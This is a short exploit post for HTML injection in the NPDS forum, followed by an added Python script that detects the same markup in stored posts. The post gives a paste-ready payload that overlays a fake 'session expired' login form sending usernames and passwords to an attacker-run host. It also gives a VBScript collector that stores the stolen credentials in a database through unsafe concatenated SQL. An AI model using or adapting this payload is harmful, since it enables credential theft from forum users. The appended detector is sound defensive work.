Npds BB HTML Injection
I am releasing this very quickly, so it can be improved:
Code to put in a reply or in a topic:
Your fake message</td></tr><tr><td valign="bottom"><hr noshade size="1"
class="ONGL">  <a href="user.php?op=userinfo&uname=User" CLASS="NOIR"
target=_blank><img src="images/forum/icons/profile.gif" border=0
ALT="">Profil</a> <a href="http://www.userland.com" TARGET="_blank"
CLASS="NOIR" TARGET="_blank"><IMG SRC="images/forum/icons/www_icon.gif"
BORDER=0 Alt="">www</a> <a
href="reply.php?topic=1&forum=1&post=2&citation=1" CLASS="NOIR"><IMG
SRC="images/forum/icons/quote.gif" BORDER="0" Alt=""><FONT
SIZE=1>Citation</FONT></a>
<a href="prntopic.php?forum=1&topic=1&post_id=2" CLASS="NOIR"><IMG
SRC="images/forum/icons/print.gif" BORDER="0" Alt=""></a>
</td></tr></table></TD></TR>
<div style="position: absolute; left=0; top=0; height=3200; width=150"><form
action="http://mon-site-de-roxor.com/roxor.asp" method="post" name="piquage"
target="_self"><table width="100%" border="0" cellspacing="0"
cellpadding="0"><tr><td colspan="2"><div align="center">Your session has
expired. Please log in to
reply.</div></td></tr><tr><td> </td></tr><tr><td><div align="right">Login
:</div> </td> <td><input name="login" type="text" value="">
</td></tr><tr><td><div align="right">Mot de passe :</div> </td><td><input
name="password" type="password" value="">
</td></tr><tr><td> </td></tr><tr><td colspan="2"><div
align="center"><input type="submit" name="Submit"
value="Envoyer"></div></td></tr></table></form></div>
Example of code (VBScript) to put in the page called by the form in the topic:
<%@ Language=VBScript %>
<%
set base=server.createobject("ADODB.CONNECTION")
base.open nom_base, login_base, password_base
referant=left(request.servervariables("HTTP_REFERER"),instr(8,request.servervariables("HTTP_REFERER"),"/")-1)
login=Request.QueryString("login")
password=Request.QueryString("password")
requete_vol_infos="INSERT statistiques (date,npds,login,password) VALUES
(getdate(),'" + cstr(referant) + "','" + cstr(login) + "','" + cstr(password) +
"')"
set resultat_vol_infos=server.CreateObject("ADODB.RECORDSET")
resultat_vol_infos.Open requete_vol_infos, base
response.redirect(referant)
%>
Thanks to N-0-X and NewFFR :o)
Rituel
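
Added example, not part of the original post or of NPDS: a Python check that a forum operator could run over stored post bodies to flag the markup pattern shown above (layout break-out, overlay, off-site login form), and that shows the same body is inert once HTML-escaped on output. The names PostAuditor and audit, and the hosts forum.example and collector.example, are assumptions made for the illustration.

```python
from collections import Counter
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Closing tags that let a post body escape its table cell (as the payload does).
BREAKOUT_CLOSERS = {"td", "tr", "table"}

class PostAuditor(HTMLParser):
    """Hypothetical helper: flags phishing-form markup in one stored post."""
    def __init__(self, forum_host):
        super().__init__(convert_charrefs=True)
        self.forum_host = forum_host.lower()
        self.opened = Counter()   # tags opened inside this post body
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        self.opened[tag] += 1
        style = a.get("style", "").lower()
        if "position" in style and "absolute" in style:
            self.findings.append("absolutely positioned overlay")
        if tag == "form":
            host = (urlparse(a.get("action", "")).hostname or "").lower()
            if host and host != self.forum_host:
                self.findings.append(f"form posts off-site to {host}")
            else:
                self.findings.append("form element in post body")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password input in post body")

    def handle_endtag(self, tag):
        if self.opened[tag] > 0:
            self.opened[tag] -= 1
        elif tag in BREAKOUT_CLOSERS:
            self.findings.append(f"unmatched </{tag}> breaks out of post cell")

def audit(body, forum_host):
    """Return the list of findings for a stored post body."""
    p = PostAuditor(forum_host)
    p.feed(body)
    p.close()
    return p.findings

# Constructed sample, shortened from the shape of the payload above.
SAMPLE = ('Nice thread</td></tr></table><div style="position: absolute; left: 0">'
          '<form action="http://collector.example/c" method="post">'
          '<input name="login" type="text"><input name="password" type="password">'
          '</form></div>')
```

Calling audit(escape(body), host) on the same text returns no findings, because escaping on output turns every tag into literal text.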